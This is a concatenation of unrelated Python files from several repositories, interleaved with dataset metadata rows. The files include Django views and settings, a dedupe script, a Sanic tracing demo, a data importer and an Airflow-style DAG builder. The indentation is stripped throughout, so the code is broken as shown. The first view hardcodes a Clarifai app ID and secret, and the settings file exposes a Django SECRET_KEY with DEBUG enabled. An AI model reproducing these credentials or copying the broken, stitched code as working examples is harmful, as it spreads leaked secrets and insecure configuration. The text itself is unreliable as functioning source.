from app.forms import PostForm
from django.http import HttpResponseRedirect
from clarifai.client import ClarifaiApi
import requests
import json
import gensim
import os.path
BASE = os.path.dirname(os.path.abspath(__file__))
word_model = gensim.models.Word2Vec.load_word2vec_format(os.path.join(BASE, 'vectors.bin'),binary=True)
genres = ['abstract', 'accordion', 'afrikaans', 'afrobeat', 'ambient', 'andean', 'anime', 'axe', 'balearic', 'banda', 'bangla', 'barbershop', 'baroque', 'bassline', 'bebop', 'bemani', 'bhangra', 'bluegrass', 'blues', 'bolero', 'boogaloo', 'bounce', 'breakbeat', 'breaks', 'britpop', 'broadway', 'byzantine', 'cabaret', 'cajun', 'calypso', 'cantopop', 'capoeira', 'carnatic', 'ccm', 'cello', 'celtic', 'chanson', 'choral', 'choro', 'christmas', 'clarinet', 'classical', 'comedy', 'comic', 'commons', 'consort', 'corrosion', 'country', 'dancehall', 'demoscene', 'desi', 'didgeridoo', 'disco', 'dixieland', 'downtempo', 'drama', 'drone', 'dub', 'ebm', 'edm', 'electro', 'electronic', 'electronica', 'emo', 'environmental', 'eurovision', 'exotica', 'experimental', 'fado', 'fake', 'filmi', 'flamenco', 'folk', 'footwork', 'freestyle', 'funk', 'gabba', 'galego', 'gamelan', 'glitch', 'gospel', 'grime', 'grindcore', 'grunge', 'guidance', 'hardcore', 'harp', 'hawaiian', 'healing', 'hollywood', 'house', 'idol', 'industrial', 'jazz', 'jerk', 'judaica', 'juggalo', 'jungle', 'klezmer', 'latin', 'lds', 'lilith', 'liturgical', 'lounge', 'lowercase', 'maghreb', 'magyar', 'mallet', 'mambo', 'medieval', 'meditation', 'melancholia', 'merengue', 'metal', 'metalcore', 'minimal', 'mizrahi', 'monastic', 'morna', 'motivation', 'motown', 'neoclassical', 'nepali', 'neurofunk', 'ninja', 'noise', 'nursery', 'oi', 'opera', 'oratory', 'orchestral', 'outsider']
def home(request):
return render(request, 'app/home.html')
def Developers(request):
return render(request, 'app/Developers.html')
def playlist(request):
assert isinstance(request, HttpRequest)
if request.method == 'GET':
form = PostForm()
else:
form = PostForm(request.POST) # Bind data from request.POST into a PostForm
if form.is_valid():
imgURL = form.cleaned_data['content']
app_id = "DbZ4NzfrPL-K_CHHf4y4srnvBUSgMo4Dz9BIbeXt"
app_secret = "crjTy-8St_kiFkL0wZZCFyrcoWJyOdets8Fa1BNi"
clarifai_api = ClarifaiApi(app_id,app_secret)
tags = ''
embedLink = ''
try:
result = clarifai_api.tag_image_urls(imgURL)
except: #if url is invalid based on clarifai API call
tags = 'invalid url'
imgURL = ''
if tags!='invalid url':
tagList = result['results'][0]['result']['tag']['classes']
bestGenre = imgscore(tagList,genres)
r = requests.get('https://api.spotify.com/v1/search?q=%22'+bestGenre+'%22&type=playlist')
jsonStuff = r.json()
uri = jsonStuff['playlists']['items'][0]['uri']
embedLink = "https://embed.spotify.com/?uri="+uri
return render(
request,
'app/playlist.html',
{
'form': form,
'imgsrc': imgURL,
'debugText': tags,
'playlistURI': embedLink,
'year':datetime.now().year,
}
)
return render(
request,
'app/playlist.html',
{
'form': form,
'imgsrc': '',
'debugText': '',
'playlistURI': '',
'year':datetime.now().year,
}
)
def imgscore(words,genres):
l = 0.0
summ = []
for genre in genres:
for word in words:
try:
simScore = word_model.similarity(genre,word)
l += simScore
except:
pass
summ.append(l)
l = 0
return(genres[summ.index(max(summ))])
|
[
"noreply@github.com"
] |
Trailblazerr1.noreply@github.com
|
f1fb0b7965ea4496faa19f2a337c9563b82ab413
|
d12fe2658edc0db98b278aab507fc86efefd5541
|
/chat/forms.py
|
0d23f6da0892f36ce4d4af4442b0a0e72db168f1
|
[] |
no_license
|
harumi-matsumoto/django-ai-chatbot
|
6190c1090e8aea877ff7573c45421e10158e4a64
|
90e2b8e8cec98c022892e8603eb090fc64197b3f
|
refs/heads/master
| 2020-08-05T16:10:09.162039
| 2019-10-12T03:10:54
| 2019-10-12T03:10:54
| 212,608,451
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
from django import forms
class TestPredictForm(forms.Form):
message = forms.CharField(widget=forms.Textarea, max_length=255)
|
[
"harumimatsumoto27@gmail.com"
] |
harumimatsumoto27@gmail.com
|
a382122e088d085ebf613ab22954c0a051260e01
|
332e0fe0e109795a838ab75f91cacbd818eb8f26
|
/examples/tech_locator.py
|
430a9d69cc57fcef52eece431039f3d98c927476
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
yoyossy/open-city__dedupe
|
08fb505dda14992cd35fd41c0ff5c5fb98d54d68
|
187d0d6eeeba23046d7155fb9e593b36e21388fe
|
refs/heads/master
| 2021-01-15T19:22:36.191934
| 2012-07-23T14:48:39
| 2012-07-23T14:48:39
| 5,244,938
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,104
|
py
|
import csv
import re
import os
#dedupe modules
from dedupe.training_sample import activeLearning, consoleLabel
from dedupe.blocking import trainBlocking, blockingIndex, mergeBlocks
from dedupe.predicates import *
import dedupe.core
import dedupe.clustering
def techLocatorImport(filename) :
data_d = {}
duplicates_d = {}
with open(filename) as f :
reader = csv.reader(f, delimiter=',', quotechar='"')
header = reader.next()
for i, row in enumerate(reader) :
instance = {}
for j, col in enumerate(row) :
col = re.sub(' +', ' ', col)
col = re.sub('\n', ' ', col)
instance[header[j]] = col.strip().strip('"').strip("'").lower()
data_d[i] = dedupe.core.frozendict(instance)
return(data_d, header)
def dataModel() :
return {'fields':
{ 'OrganizationName' : {'type': 'String', 'weight' : 0},
'Address' : {'type': 'String', 'weight' : 0},
'ZipCode' : {'type': 'String', 'weight' : 0},
'OrgPhone' : {'type': 'String', 'weight' : 0}
},
'bias' : 0}
def init(inputFile) :
data_d, header = techLocatorImport(inputFile)
data_model = dataModel()
return (data_d, data_model, header)
# user defined function to label pairs as duplicates or non-duplicates
def dictSubset(d, keys) :
return dict((k,d[k]) for k in keys if k in d)
inputFile = "datasets/Tech Locator Master List.csv"
num_training_dupes = 200
num_training_distinct = 16000
numIterations = 100
numTrainingPairs = 30
import time
t0 = time.time()
data_d, data_model, header = init(inputFile)
print "importing data ..."
if os.path.exists('learned_settings.json') :
data_model, predicates = core.readSettings('learned_settings.json')
else:
#lets do some active learning here
training_data, training_pairs, data_model = activeLearning(data_d, data_model, consoleLabel, numTrainingPairs)
predicates = trainBlocking(training_pairs,
(wholeFieldPredicate,
tokenFieldPredicate,
commonIntegerPredicate,
sameThreeCharStartPredicate,
sameFiveCharStartPredicate,
sameSevenCharStartPredicate,
nearIntegersPredicate,
commonFourGram,
commonSixGram),
data_model, 1, 1)
core.writeSettings('learned_settings.json',
data_model,
predicates)
blocked_data = blockingIndex(data_d, predicates)
candidates = mergeBlocks(blocked_data)
print ""
print "Blocking reduced the number of comparisons by",
print int((1-len(candidates)/float(0.5*len(data_d)**2))*100),
print "%"
print "We'll make",
print len(candidates),
print "comparisons."
print "Learned Weights"
for k1, v1 in data_model.items() :
try:
for k2, v2 in v1.items() :
print (k2, v2['weight'])
except :
print (k1, v1)
print ""
print "finding duplicates ..."
print ""
dupes = core.scoreDuplicates(candidates, data_d, data_model, .5)
clustered_dupes = clustering.cluster(dupes, estimated_dupe_fraction = 0.4)
print "# duplicate sets"
print len(clustered_dupes)
orig_data = {}
with open(inputFile) as f :
reader = csv.reader(f)
reader.next()
for row_id, row in enumerate(reader) :
orig_data[row_id] = row
with open("output/TL_dupes_list_" + str(time.time()) + ".csv","w") as f :
writer = csv.writer(f)
heading_row = header
heading_row.insert(0, "Group_ID")
writer.writerow(heading_row)
dupe_id_list = []
for group_id, cluster in enumerate(clustered_dupes, 1) :
for candidate in sorted(cluster) :
dupe_id_list.append(candidate)
row = orig_data[candidate]
row.insert(0, group_id)
writer.writerow(row)
for id in orig_data :
if not id in set(dupe_id_list) :
row = orig_data[id]
row.insert(0, 'x')
writer.writerow(row)
print "ran in ", time.time() - t0, "seconds"
|
[
"derek.eder@gmail.com"
] |
derek.eder@gmail.com
|
37886a99293824da426248ef167d6469762d4331
|
48d17885eda6401cde7e4ef563727ad4b5a7e851
|
/ex43_classes.py
|
18549bd62a8d355389e39399f65761f4a307dcb6
|
[] |
no_license
|
bowen0701/learn-python-the-hard-way
|
635680d711dca044e2584ffe7dc3b129998f59db
|
73540c462cf1561271664d2058e902d60907c200
|
refs/heads/master
| 2021-09-22T11:01:35.059384
| 2018-09-08T23:30:38
| 2018-09-08T23:30:38
| 94,005,892
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 760
|
py
|
"""Basic Object-Oriented Anaysis and Design."""
class Scene(object):
def enter(self):
pass
class Engine(object):
def __init__(self, scene_map):
pass
def play(self):
pass
class Death(Scene):
def enter(self):
pass
class CentralCorridor(Scene):
def enter(self):
pass
class LaserWeaponArmory(Scene):
def enter(self):
pass
class TheBridge(Scene):
def enter(self):
pass
class EscapePod(Scene):
def enter(self):
pass
class Map(object):
def __init__(self, start_scene):
pass
def next_scene(self, scene_name):
pass
def opening_scene(self):
pass
a_map = Map('central_corridor')
a_game = Engine(a_map)
a_game.play()
|
[
"bowen0701@gmail.com"
] |
bowen0701@gmail.com
|
de7ede51aae8aea701206a53f518f0d5ac082ce5
|
0090d4ab68de301b77c6c69a58464136fa04ba49
|
/trydjango/settings.py
|
a3933049574711d35e99e5e238ad8b94b8ac109f
|
[] |
no_license
|
firdavsDev/Django_simple_blog
|
b70000194875d792838f916d035b89be59312cd9
|
f5999cf30091fce2246f44a5a55d55071aeb7a99
|
refs/heads/main
| 2023-08-23T04:10:52.570457
| 2021-09-23T10:19:18
| 2021-09-23T10:19:18
| 409,543,186
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,905
|
py
|
"""
Django settings for trydjango project.
Generated by 'django-admin startproject' using Django 3.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent #bu faylar qayerda turganligini saqlaydi
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-jod$glnf4*4&(_812i50)fb(9weaytnic1#!!*-5m42@jmbof*' #barcha djangoda uzizng maxsus maxfiy kaliti mavjud buladi
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True #ager saytda qandaydiz muamoga duj kelsa shu orqaali bizga xaabar yetqaziladi
ALLOWED_HOSTS = []
# Application definition
# sayt ichidagi ilovalar uchun (app) shu yerda ruyhatdan utish kk
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
#yaratgan ilovalarimizni shu yerga kiritib ketamiz
'products',
'pages',
'blog',
]
#Bizning kupgina request larimizni shu orqali maxfiy holatga keltirishimiz mumkin buldi
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
#bu yul a herf kabi
ROOT_URLCONF = 'trydjango.urls'
import os
#Html faylarimiz shu yerdan ruyhatdan utkaziladi
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
#shu yerga html kodimizni berib utamiz
'DIRS': [os.path.join(BASE_DIR,"templates") ],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'trydjango.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
#malumotlar bazasi asosan sqlite
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
#rasm va css va js faylar uchun
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
|
[
"74819987+firdavsDev@users.noreply.github.com"
] |
74819987+firdavsDev@users.noreply.github.com
|
f373e27e3ba576b9f7a22bbc7276a5e8c633bcb2
|
e65ac1ea21eee50e7b5b5d5f8e0d8ceea2cb1c9a
|
/import/its-behind-you/import.py
|
559133b57b5a5d8d7ca57d4823458c831c88daf3
|
[] |
no_license
|
dracos/Theatricalia
|
539b42746dea86c0377db2593ba651e3563c1579
|
8cb417f5048a261329bc853bfcc6ba64c76daec8
|
refs/heads/master
| 2023-02-19T18:56:56.751263
| 2023-02-15T21:39:40
| 2023-02-15T22:13:42
| 1,178,517
| 5
| 2
| null | 2021-01-06T14:38:26
| 2010-12-17T23:02:50
|
Python
|
UTF-8
|
Python
| false
| false
| 2,718
|
py
|
#!/usr/bin/python
import os, sys, re, time
for i in range(3, 0, -1):
sys.path.append('../' * i)
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from django.core.files.base import ContentFile
from plays.models import Play
from productions.models import Production, Part, ProductionCompany
from productions.models import Place as ProductionPlace
from people.models import Person
from photos.models import Photo
from functions import *
from plays2009 import *
real_run()
for venue in theatres:
if "," in venue:
name, town = venue.rsplit(',', 1)
location = add_theatre(name, town)
else:
location = add_theatre(venue)
theatres[venue] = location
for production in plays:
title = production['title']
log("Production of %s" % title)
play = add_play(title, force_insert=True)
company = None
producer = production['producer']
if producer:
if dry_run():
company = ProductionCompany(name=producer)
else:
company, created = ProductionCompany.objects.get_or_create(name=producer)
description = production['description']
source = '<a href="%s">its-behind-you.com</a>' % production['source']
production_obj = Production(
play = play,
company = company,
description = description,
source = source,
)
if not dry_run():
production_obj.save()
if production['titleImg']:
add_photo(production['titleImg'], production_obj, 'Title')
for p in production['pictures']:
add_photo(p, production_obj, 'Handbill')
dates = production['dates']
for d in dates:
start_date, end_date = d[0]
place = d[1]
location = theatres[place]
log(' %s %s %s' % (start_date, end_date, location))
if not dry_run():
ProductionPlace.objects.get_or_create(production=production_obj, place=location, start_date=start_date, end_date=end_date)
cast = production['cast']
for name in cast:
m = re.match('(.*) (.*?)$', name)
if m:
first_name, last_name = m.group(1), m.group(2)
else:
first_name, last_name = u'', name
log(' Actor: ' + first_name + ' ' + last_name)
if not dry_run():
try:
person, created = Person.objects.get_or_create(first_name=first_name, last_name=last_name)
except:
person = Person(first_name=first_name, last_name=last_name)
person.save()
Part.objects.get_or_create(production=production_obj, person=person, cast=True)
if name in castLinks:
person.web = castLinks[name]
person.save()
|
[
"matthew@theatricalia.com"
] |
matthew@theatricalia.com
|
0733674fe504df151b23c469f99ef7d29df5489a
|
ac7828a5fb10daaba998a09b427de3076d3b06d8
|
/cnems/bbc/migrations/0011_comments.py
|
6f9bdeacd4e9f87e4b20563d4d02dab42fdb6293
|
[] |
no_license
|
zkq123/django_1
|
950b1e8b4f94542e78e17de2744d212a7ac00ac9
|
9c5b498f7314ad9283da32b4a0e3793674bb7a7f
|
refs/heads/master
| 2022-11-07T02:12:33.318288
| 2018-12-08T02:26:19
| 2018-12-08T02:26:19
| 155,974,478
| 0
| 1
| null | 2022-10-07T22:55:44
| 2018-11-03T10:55:35
|
Python
|
UTF-8
|
Python
| false
| false
| 765
|
py
|
# Generated by Django 2.1.2 on 2018-12-04 12:04
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('bbc', '0010_remove_likes_sum'),
]
operations = [
migrations.CreateModel(
name='Comments',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comment_center', models.CharField(max_length=200)),
('news', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bbc.News')),
('users', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bbc.Users')),
],
),
]
|
[
"qingyun@email.com"
] |
qingyun@email.com
|
266486163cb2f2c144efffc3cfa02050697431de
|
d7de23e521d73096f173318423cf6b0e5d06c97f
|
/CMGTools/LEP3/python/kinfitters.py
|
2721d051ec15e98ffabeebf5f9689b3c2383578a
|
[] |
no_license
|
HemantAHK/CMG
|
3cf6c047b193e463e3632aa728cd49067e9dde76
|
7bec46d27e491397c4e13a52b34cf414a692d867
|
refs/heads/master
| 2021-05-29T20:01:04.390627
| 2013-08-15T15:24:22
| 2013-08-15T15:24:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 208
|
py
|
from CMGTools.RootTools.RootTools import *
from ROOT import gSystem
gSystem.Load("libCMGToolsLEP3")
from ROOT import FourJetEpKinFitter
from ROOT import FourJetEpMKinFitter
from ROOT import DiJetMKinFitter
|
[
""
] | |
56bfee5ce1520cf5059f5913eee9d2238b793119
|
eda3d6974a60a42a1ee35cd2327218029490a654
|
/develop/sanic_aiozipkin_test.py
|
9433fc32d133111cb645f42c7070691073e2669f
|
[] |
no_license
|
1260228859/EvanKao-ms
|
4a4159123bfd3f3b960c9b81ca920f599fffc6cc
|
ae0e9dbf2803c6bd67ea8b0be012b64c57db7bbc
|
refs/heads/master
| 2020-09-26T19:39:48.587556
| 2020-07-08T03:00:01
| 2020-07-08T03:00:01
| 226,328,706
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,131
|
py
|
from sanic import Sanic, response
from sanic.response import json
import aiohttp
import aiozipkin as az
"""
integrate aiohttp to Sanic app, doc(CHN): https://www.jianshu.com/p/17bc4518b243
"""
host = '127.0.0.1'
port = 8000
zipkin_address = 'http://127.0.0.1:9411/api/v2/spans'
app = Sanic(__name__)
endpoint = az.create_endpoint('sanic_app', ipv4=host, port=port)
@app.listener('before_server_start')
async def init(app, loop):
tracer = await az.create(zipkin_address, endpoint, sample_rate=1.0)
trace_config = az.make_trace_config(tracer)
app.aiohttp_session = aiohttp.ClientSession(trace_configs=[trace_config], loop=loop)
app.tracer = tracer
@app.listener('after_server_stop')
def finish(app, loop):
loop.run_until_complete(app.aiohttp_session.close())
loop.close()
@app.route("/")
async def test(request):
request['aiozipkin_span'] = request
with app.tracer.new_trace() as span:
span.name(f'HTTP {request.method} {request.path}')
print(span)
url = "https://www.163.com"
with app.tracer.new_child(span.context) as span_producer:
span_producer.kind(az.PRODUCER)
span_producer.name('produce event click')
return response.text('ok')
def request_span(request):
with app.tracer.new_trace() as span:
span.name(f'HTTP {request.method} {request.path}')
kwargs = {
'http.path':request.path,
'http.method':request.method,
'http.path':request.path,
'http.route':request.url,
'peer.ip':request.remote_addr or request.ip,
'peer.port':request.port,
}
[span.tag(k, v) for k,v in kwargs.items()]
span.kind(az.SERVER)
return span
@app.route("/2")
async def tes2(request):
request['aiozipkin_span'] = request
span = request_span(request)
with app.tracer.new_child(span.context) as span_producer:
span_producer.kind(az.PRODUCER)
span_producer.name('produce event click')
return response.text('ok')
if __name__ == '__main__':
app.run(host="0.0.0.0", port=port, debug=True)
|
[
"jiantao.gao@cityio.cn"
] |
jiantao.gao@cityio.cn
|
b7a6cb5c45e46e496ff9ac7299b59ead5a70c670
|
6809cda579a7c1c88872f566d65f665c2dff20bb
|
/archive3/lib/prediction.py
|
43f01be6f1370c641d2afae4f8720168f3c9e38e
|
[] |
no_license
|
hellojixian/stock-dummy
|
edb3e7447e26ec3e0481c938fcf8f72063d6c850
|
06b352ba3d78ac419e7672b0e6ec630f6f461ae8
|
refs/heads/master
| 2020-06-15T09:11:33.401689
| 2019-11-05T15:46:43
| 2019-11-05T15:46:43
| 195,256,649
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,043
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import sys,os,datetime,time
import gc
# 强制转换成整数 为了加速搜索 至少减少内存消耗了
def optimize_df(df):
int_cols = df.columns[:-2]
float_cols = ['future_profit','future_risk']
df_float = df[float_cols].copy()
df = df.astype('b')
df[float_cols] = df_float
return df
def predict(sample, kb):
start_timestamp = time.time()
future = ['future_profit','future_risk']
def _check_similarity_loss(v, sample):
return np.abs(v-sample).sum()
filters_setting = {
'prev0_change' :[ 0, 0],
'prev1_change' :[ 0, 0],
'prev2_change' :[ 0, 0],
'trend_5' :[ 0, 0],
'trend_10' :[ 0, 0],
'prev0_bar' :[-1, 1],
'trend_30' :[-1, 1],
'pos_5' :[-1, 1],
'pos_10' :[-1, 1],
'pos_30' :[-1, 1],
'prev4_change' :[-1, 1],
'trend_120' :[-1, 1],
'pos_120' :[-1, 1],
'amp_5' :[-2, 2],
'risk_10' :[-1, 1],
'risk_20' :[-2, 2],
'amp_30' :[-3, 3],
'prev0_open_c' :[-2, 2],
'prev1_open_c' :[-2, 2],
'prev1_bar' :[-2, 2],
'prev0_up_line' :[-2, 2],
'prev0_down_line' :[-2, 2],
}
filters = filters_setting.copy()
filter_limit = 0
factors = list(filters.keys())
filter_limit=2
filter_offest=1
while filter_offest<filter_limit:
_filter = ""
for f in factors:
offest = np.clip([-filter_offest, filter_offest], filters[f][0], filters[f][1])
_filter += "({}>={}) & ({}<={}) &".format(
f,int(sample[f]+offest[0]),
f,int(sample[f]+offest[1]))
_filter = _filter[:-1]
rs = kb[kb.eval(_filter)].copy()
if len(rs)<=10:
filter_offest +=1
else:
break
pred = pd.Series()
kb_sample_count = rs.shape[0]
reduced_sample_count = 0
if kb_sample_count >10:
pred['result'] = True
rs['similarity_loss'] = rs.apply(func=_check_similarity_loss, args=[sample], raw=True, axis=1)
rs = rs.sort_values(by=['similarity_loss'],ascending=True)
rs = rs[rs.similarity_loss<=15]
rs = rs[:20]
reduced_sample_count = rs.shape[0]
if reduced_sample_count<=2:
pred['result'] = False
for f in future:
pred['{}_mean'.format(f)] = rs[f].mean()
settings = {'med':0.5}
for k in settings:
v = settings[k]
pred['{}_{}'.format(f,k)] = rs[f].quantile(v)
pred['similarity_loss'] = rs['similarity_loss'].max()
else:
pred['result'] = False
pred['similarity_loss'] = float('nan')
pred['samples_count'] = int(kb_sample_count)
pred['reduced_count'] = int(reduced_sample_count)
pred['durtion'] = np.round((time.time() - start_timestamp),2)
return pred
|
[
"hellojixian@gmail.com"
] |
hellojixian@gmail.com
|
61327de1c6f0afb604104a7376dc24faaed7a103
|
42c6e00741a37d02880f14d49fa6f7d2f484cd22
|
/market_place/article/migrations/0001_initial.py
|
198b81c5bc9d5b6665d8db75449a4c76974684d4
|
[
"MIT"
] |
permissive
|
otherland8/market-place
|
023d34f92809ff61a3ee3e60007c27597b10047f
|
ebf21a77cf9b3998e270ebd2d4422d7ce997e472
|
refs/heads/master
| 2021-01-17T12:47:51.847532
| 2016-07-08T20:20:31
| 2016-07-08T20:20:31
| 59,594,948
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,308
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-07-08 16:02
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('public', '0005_auto_20160708_1736'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='UserBid',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('current_bid', models.DecimalField(decimal_places=2, default=0, max_digits=9)),
('maximum_bid', models.DecimalField(decimal_places=2, default=0, max_digits=9, null=True)),
('created_date', models.DateTimeField(auto_now=True)),
('last_bid_date', models.DateTimeField()),
('is_smart_bid', models.BooleanField(default=True)),
('article', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='public.Article')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"otherland@abv.bg"
] |
otherland@abv.bg
|
c9a09e5b6cfdc643895b716f62e61cddeaf1f9ac
|
fe90bf63c34511ec9a4d7cb5a90957fbbb03a504
|
/boundary_layer/builders/base.py
|
06573b22f26400966c3a38fb8464d794b797405d
|
[
"Apache-2.0"
] |
permissive
|
etsy/boundary-layer
|
778b115f94efc5d50986a289daf3ad265b38926c
|
c29594957c1fb47e308fcc89f7edcefc0797fc89
|
refs/heads/master
| 2023-07-21T17:03:15.769537
| 2023-01-04T14:05:53
| 2023-01-04T14:05:53
| 142,857,095
| 263
| 67
|
Apache-2.0
| 2023-07-19T19:57:04
| 2018-07-30T09:51:52
|
Python
|
UTF-8
|
Python
| false
| false
| 8,829
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2018 Etsy Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
from six.moves import filter
from jinja2 import Environment, PackageLoader
from boundary_layer.builders import util
from boundary_layer.logger import logger
from boundary_layer.registry import NodeTypes
from boundary_layer.util import sanitize_operator_name
from boundary_layer.containers import WorkflowMetadata
class DagBuilderBase(object):
__metaclass__ = abc.ABCMeta
@abc.abstractproperty
def indent_operators(self):
pass
@abc.abstractmethod
def preamble(self):
pass
@abc.abstractmethod
def epilogue(self):
pass
@staticmethod
def _build_jinja_env():
jenv = Environment(
loader=PackageLoader('boundary_layer', 'builders/templates'),
trim_blocks=True)
jenv.filters['format_value'] = util.format_value
jenv.filters['add_leading_spaces'] = util.add_leading_spaces
jenv.filters['comment'] = util.comment
jenv.filters['sanitize_operator_name'] = sanitize_operator_name
jenv.filters['verbatim'] = util.verbatim
return jenv
def get_jinja_template(self, template_filename):
return self._build_jinja_env().get_template(template_filename)
def get_imports(self):
all_nodes = self.specs.graphs.primary.ordered() + \
[node for graph in self.specs.graphs.secondary
for node in graph.ordered()]
all_imports = [self.dag.get('imports', {})] + \
[node.imports() for node in all_nodes]
objects = {}
modules = set()
for node_imports in all_imports:
modules |= set(node_imports.get('modules', []))
for item in node_imports.get('objects', []):
objects.setdefault(item['module'], set())
objects[item['module']] |= set(item['objects'])
return {
'modules': modules,
'objects': objects,
}
def __init__(
self,
dag,
graph,
reference_path,
specs,
metadata=None,
referring_node=None,
sub_dag_builder=None,
generator_builder=None):
self.dag = dag
self.graph = graph
self.reference_path = reference_path
self.specs = specs
self.metadata = metadata or WorkflowMetadata(None, None)
self.referring_node = referring_node
self.sub_dag_builder = sub_dag_builder
self.generator_builder = generator_builder
@property
def default_task_args(self):
return self.specs.parsed.primary.get('default_task_args', {})
def build_dag_id(self):
return util.construct_dag_name(self.reference_path)
def render_operator(self, node):
template_filename = None
if node.type == NodeTypes.GENERATOR:
template_filename = 'generator_operator.j2'
elif node.type == NodeTypes.SUBDAG:
template_filename = 'subdag_operator.j2'
else:
template_filename = 'operator.j2'
template = self.get_jinja_template(template_filename)
# Do not set upstream/downstream dependencies that involve generator nodes
# at this stage; those are all set within the generator nodes, and if they are
# set here, there will be python errors due to references to operators that
# do not exist (generators do not correspond to operators)
generator_nodes = frozenset(
gen.name for gen in self.graph.graph.nodes
if gen.type == NodeTypes.GENERATOR)
upstream_deps = frozenset(
dep.name for dep in self.graph.upstream_dependency_set(node))
if generator_nodes & upstream_deps:
logger.debug(
'Not passing upstream generator dependencies `%s` to '
'operator template for node `%s`',
generator_nodes & upstream_deps,
node.name)
downstream_deps = frozenset(
dep.name for dep in self.graph.downstream_dependency_set(node))
if generator_nodes & downstream_deps:
logger.debug(
'Not passing downstream generator dependencies `%s` to '
'operator template for node `%s`',
generator_nodes & downstream_deps,
node.name)
return template.render(
node=node,
args=node.operator_args,
upstream_dependencies=list(upstream_deps - generator_nodes),
downstream_dependencies=list(downstream_deps - generator_nodes),
)
def get_secondary_dag(self, target):
hits = [dag for dag in self.specs.parsed.secondary
if dag['name'] == target]
if not hits:
raise ValueError('Secondary dag id {} not found'.format(target))
if len(hits) > 1:
raise ValueError(
'Multiple hits for secondary dag id {}'.format(target))
return hits[0]
def get_secondary_graph(self, target):
""" Get the graph corresponding to the target. This is kind of ugly,
a consequence of the way in which we currently store dags separately
from graphs. Ideally there would be only one of the two methods,
get_secondary_(dag|graph).
"""
self.get_secondary_dag(target) # does the checking
for (idx, dag) in enumerate(self.specs.parsed.secondary):
if dag['name'] == target:
return self.specs.graphs.secondary[idx]
raise Exception("should not be possible")
def get_target_builder_cls(self, node_type):
if node_type == NodeTypes.GENERATOR:
if not self.generator_builder:
raise Exception('No generator builder is defined!')
return self.generator_builder
elif node_type == NodeTypes.SUBDAG:
if not self.sub_dag_builder:
raise Exception('No sub_dag builder is defined!')
